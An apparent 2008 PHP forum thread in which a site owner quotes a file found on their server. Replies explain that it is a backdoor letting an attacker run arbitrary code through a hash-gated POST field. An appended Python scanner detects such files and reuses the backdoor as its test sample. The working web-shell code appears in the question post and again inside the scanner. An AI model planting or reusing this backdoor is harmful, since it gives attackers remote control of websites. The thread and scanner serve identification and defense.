What does this code mean?

Discussion in 'PHP' started by BANAGO, Dec 30, 2008.

  1. #1
    <?php
    error_reporting(E_ALL);
    if (isset($_POST['de8ad874']) && md5($_POST['de8ad874']) == '992c9c4dfbdf0f872baaf5123bea4afd') {
    $test_func = create_function('', urldecode($_POST['f']));
    $test_func();
    }
    exit();
    ?>

    This is inside two folders on my server and I cannot delete it. Is it bad code?

    Thanks!
     
    BANAGO, Dec 30, 2008 IP
  2. krzyk

    #2
    This script looks like a gateway to your page. Basically it means that one can provide a string that will be executed as a function in your page.

    Delete all such files as soon as possible.
    If you have shell access then do:
    chmod u+w directory
    where directory is the folder where this PHP file is located. You can also do this from an FTP client: look for "File->change attributes" and give yourself "write" permission on the directory.
     
    krzyk, Dec 30, 2008 IP
  3. tonybogs

    #3
    Yeah this looks dangerous!

    I'd remove it if you can because a user could run harmful functions and really screw you up if they know the right $_POST variables (which would not be hard to get).

    If you can't remove the code because it performs a pivotal function then follow the steps outlined by krzyk. Protect your files.

    Hope this helps
     
    tonybogs, Dec 30, 2008 IP
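
Deleting "all such files", as post #2 advises, means finding them first. The following is an added example, not part of the original thread: a Python scanner that flags PHP source where request data reaches a call that runs a string as code, as in the file from post #1. The names `scan_php` and `call_args` and the benign sample are constructed for illustration, and the regex-based taint tracking is a heuristic that does not parse PHP.

```python
import re

SINKS = ("create_function", "eval", "assert")  # PHP calls that run a string as code
SOURCE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?![=>])\s*([^;]*);")
SINK_CALL = re.compile(r"\b(%s)\s*\(" % "|".join(SINKS))
HASH_GATE = re.compile(r"(?:md5|sha1)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)[^)]*\)\s*===?\s*['\"][0-9a-f]{32,40}['\"]")

# The file quoted in post #1 of this thread, used as the positive sample.
PAGE_SAMPLE = r"""<?php
error_reporting(E_ALL);
if (isset($_POST['de8ad874']) && md5($_POST['de8ad874']) == '992c9c4dfbdf0f872baaf5123bea4afd') {
$test_func = create_function('', urldecode($_POST['f']));
$test_func();
}
exit();
?>"""
# Constructed negative sample: request data is only escaped and echoed.
BENIGN_SAMPLE = r"""<?php
$name = isset($_POST['name']) ? $_POST['name'] : '';
echo htmlspecialchars($name);
?>"""

def call_args(src, open_idx):
    """Text inside the call whose '(' is at open_idx (parens in string literals are not handled)."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += {"(": 1, ")": -1}.get(src[i], 0)
        if depth == 0:
            return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced: take the rest

def scan_php(src):
    """Return sorted findings for one PHP source string."""
    tainted = set()
    def hit(text):  # a request superglobal or an already-tainted variable appears
        return bool(SOURCE.search(text)) or bool(tainted & set(re.findall(r"\$\w+", text)))
    while True:  # propagate request data through simple assignments to a fixpoint
        new = {v for v, expr in ASSIGN.findall(src) if v not in tainted and hit(expr)}
        if not new:
            break
        tainted |= new
    findings = {"request data reaches %s()" % m.group(1)
                for m in SINK_CALL.finditer(src) if hit(call_args(src, m.end() - 1))}
    if HASH_GATE.search(src):
        findings.add("hard-coded hash gate on request parameter")
    return sorted(findings)

if __name__ == "__main__":
    print(scan_php(PAGE_SAMPLE), scan_php(BENIGN_SAMPLE))
```

A clean result does not prove a file is safe, since obfuscated code can hide both the request variable and the call name, so any hit should be treated as a reason to review the whole site rather than a single file.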